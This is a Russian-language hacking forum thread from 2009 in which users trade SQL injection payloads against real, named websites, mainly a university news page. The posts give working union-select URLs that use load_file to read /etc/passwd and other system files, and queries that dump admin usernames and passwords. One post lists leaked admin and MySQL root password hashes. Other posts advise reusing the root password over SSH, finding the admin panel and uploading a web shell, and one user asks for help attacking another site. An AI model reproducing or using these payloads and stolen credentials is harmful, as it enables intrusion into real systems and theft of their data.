Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    скорее всего да
    если там идут числовые значения то можно попробовать так
    http://www.site.ru/pop/search.cgi?q=2-1
    http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=1
    http://www.site.ru/pop/search.cgi?q=1/**/and/**/1=2
    ну а так сайт в ЛС если не трудно:)
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Кинь сайт в личку, или пробуй:
    Code:
    http://www.site.ru/pop/search.cgi?q=1)+order+by+1%23
     
  3. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    есть функция load_file
    magic_quotes_on
    удалось прочитать несколько файлов, вот только их содержимое несовсем понятно што из этого можна извлечь полезного (в мозиле у меня все отобразилось в непонятных кодах,в гугл хроме нормально)
    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file%280x2f7661722f61646d2f77746d70%29,3,4,5--
    /var/adm/wtmp
    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f75746d70),3,4,5--
    /var/adm/qacct
     
  4. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    админка:
    Code:
    forester:*676243218923905CF94CB52A3C9D3EB30CE8E20D
    bsimpson:*81BDE0E8E0BA1F502F94C27035B496267B88E712
    mysql:
    Code:
    root:*E73484FBEEB33C026E5ADBCA26E267B837C846E3:Y
     
    1 person likes this.
  5. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    обычно читаются файлы настроек, исходники скриптов. соответсвенно от твоих целей и нужно действовать.
    ЗЫ Задай себе вопрос- что я хочу? ;)
     
    #10485 x[0]x, 6 Dec 2009
    Last edited: 6 Dec 2009
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    да мнебы конфиги, или возможно логи прочитать)
    но я с етой системой незнаком(
     
  7. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Такой вопрос по mysql-inj...
    Я хочу проапдейтить колонку, но про апдейтить так чтобы в нее была записана какая либа сущ. инфа из таблицы (но другой)(т.е. есть иньекция в параметре update)

    Как это сделать? И возможно ли?
     
    #10487 wolmer, 6 Dec 2009
    Last edited: 6 Dec 2009
  8. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    никс ситемка ;)
    ------------------
    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,load_file(0x2f6574632f706173737764),3,4,5-- /etc/passwd
    -------------------
     
  9. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    какими средствами ты распологаешь? доступ? права? :confused:
     
  10. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Подправил пост (точно сформулировал теперь)
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4,5+from+admin_users--
    Spyder, а ТЫ залил шелл? )
     
    #10491 mailbrush, 6 Dec 2009
    Last edited: 6 Dec 2009
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    да я /etc/passwd в первую очередь прочитал)
    но там всеравно сильно невыжмеш с нее(
    кавычка слешируется)
     
  13. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    сомниваюсь штобы Spyder залил...
    каким образом?
    через логи?
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А ты не сомневайся ;)
     
  15. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    reverse ip => выбирай сайты - читалка у тебя есть.

    можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку :)

    хотя долго искать не придется
    http://wolfpack.loyno.edu/admin/
    :eek: )
    сложи 1+1 )

    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
    +
    http://wolfpack.loyno.edu/admin/
    --
    вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)
     
    #10495 x[0]x, 6 Dec 2009
    Last edited: 6 Dec 2009
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
    а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
    я думаю в данном случае шелл незалить...
    p.s если неправ доказуйте обратное) с удовольствием выслушаю...

    mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
    я несомниваюсь што здесь есть ребята которые смогут это зделать)
     
    #10496 547, 6 Dec 2009
    Last edited: 6 Dec 2009
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    У тебя нету нестандартного мышления ;)
     
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    с чего ты взял? :cool:
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

    PS:
    Code:
    http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,2,3,4,load_file(0x2F746D702F6D61696C6272757368)
     
    1 person likes this.
  20. MaydDay

    MaydDay New Member

    Joined:
    21 Oct 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    можно что-нибуть выжать или дохлый номер?
    http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='
     
Thread Status:
Not open for further replies.